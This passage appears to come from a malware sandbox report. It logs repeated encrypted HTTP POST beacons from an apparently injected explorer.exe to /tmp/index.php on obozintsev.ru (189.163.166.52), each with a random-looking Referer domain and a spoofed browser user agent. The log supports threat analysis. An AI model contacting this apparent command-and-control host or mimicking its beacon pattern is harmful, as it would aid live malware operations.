Nov 30, 2024 11:12:32.517262936 CET	253	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 5b 18 a6 f2 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu[7Tcp'4zz4HbGZC axWur'" C0Q]'r&Q\wlhF`,6t8ab%3'<
Nov 30, 2024 11:12:34.315684080 CET	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:33 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:34.490216017 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://idmlsaxfuvndeti.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: obozintsev.ru
Nov 30, 2024 11:12:34.490226030 CET	160	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 44 29 dc 97 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuD)aH@ouDfG@gEmY_2^8[8ipvOJE
Nov 30, 2024 11:12:36.283663034 CET	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:35 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:36.406519890 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dqwcacyxyiufxcg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 122 Host: obozintsev.ru
Nov 30, 2024 11:12:36.406564951 CET	122	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 64 35 aa 91 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vud5sPl~pnaMD*5{n
Nov 30, 2024 11:12:38.493619919 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:38.616270065 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vbibiexffybg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: obozintsev.ru
Nov 30, 2024 11:12:38.616338015 CET	126	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 4a 19 ab 98 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuJ^Vcu.L.\|k8x%?
Nov 30, 2024 11:12:40.403886080 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:40.539100885 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rcoksbrtpdmb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 169 Host: obozintsev.ru
Nov 30, 2024 11:12:40.539115906 CET	169	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 65 06 c4 90 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vueG_epT='rt4gfvPK,&kO:&P87fd2
Nov 30, 2024 11:12:42.335429907 CET	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:42 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:42.461447954 CET	286	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://limsldbbguqnsba.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: obozintsev.ru
Nov 30, 2024 11:12:42.461447954 CET	262	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 77 25 af f4 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuw%JEe9g_N8~]g1lex1@6IANN:J@bB34]B_Zj!f:aa$CfuajO\!
Nov 30, 2024 11:12:44.476198912 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:44.601337910 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://indpkapnwuhe.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: obozintsev.ru
Nov 30, 2024 11:12:44.601353884 CET	271	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 3f 58 e6 9c Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu?X\GCY`bIJ)1U1ss%$Fw7'M@s}1Y$RRjK#x0sI*W4)sOx;}\|:G$e
Nov 30, 2024 11:12:46.397649050 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:46.529252052 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wdrrntcgtbyvfp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: obozintsev.ru
Nov 30, 2024 11:12:46.529280901 CET	130	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 65 34 ce e5 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vue4`.EjpJ.z5#B-oh3
Nov 30, 2024 11:12:48.544128895 CET	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:48 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:48.667563915 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ehvxkgepwxtygl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 364 Host: obozintsev.ru
Nov 30, 2024 11:12:48.667592049 CET	364	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 3e 1d d8 a7 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vu>QR\|LuX^x#Pu5FIB@H+JN-jC.-V:8u]x#,HRK[8j@Y#Tb
Nov 30, 2024 11:12:50.425718069 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:50.548768997 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tejbjmlbuatgr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 112 Host: obozintsev.ru
Nov 30, 2024 11:12:50.548789024 CET	112	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 58 3b c0 9d Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuX;uYQ,wL{1X
Nov 30, 2024 11:12:52.340101957 CET	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:52 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:52.463105917 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://otfwaojfoxegoc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 272 Host: obozintsev.ru
Nov 30, 2024 11:12:52.463133097 CET	272	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 4e 59 e2 ff Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vuNYrDl^Kew*;Ws]]ONK0(^QT}x#0?Y\K_buXY}#li{hZN[s$@59
Nov 30, 2024 11:12:54.211771011 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 11:12:54.339349985 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kqylhpxweftfa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 358 Host: obozintsev.ru
Nov 30, 2024 11:12:54.339375019 CET	358	OUT	Data Raw: 3b 6e 58 13 82 be 6b 22 da a9 c7 01 75 03 7c b7 78 79 ce e2 63 72 95 63 00 7c 0b 91 40 cb c1 6b ee 5c c0 21 72 6e 56 6e 9f 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 6c 23 aa 92 Data Ascii: ;nXk"u\|xycrc\|@k\!rnVn? 9Yt M@NA -[k,vul#uKFnNti@DqFJaA=ZTR,TX ]>/Fx?!B=\EPhh\HL:1"Ey$KjeJfXC2
Nov 30, 2024 11:12:56.079293966 CET	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 30 Nov 2024 10:12:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49754	189.163.166.52	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
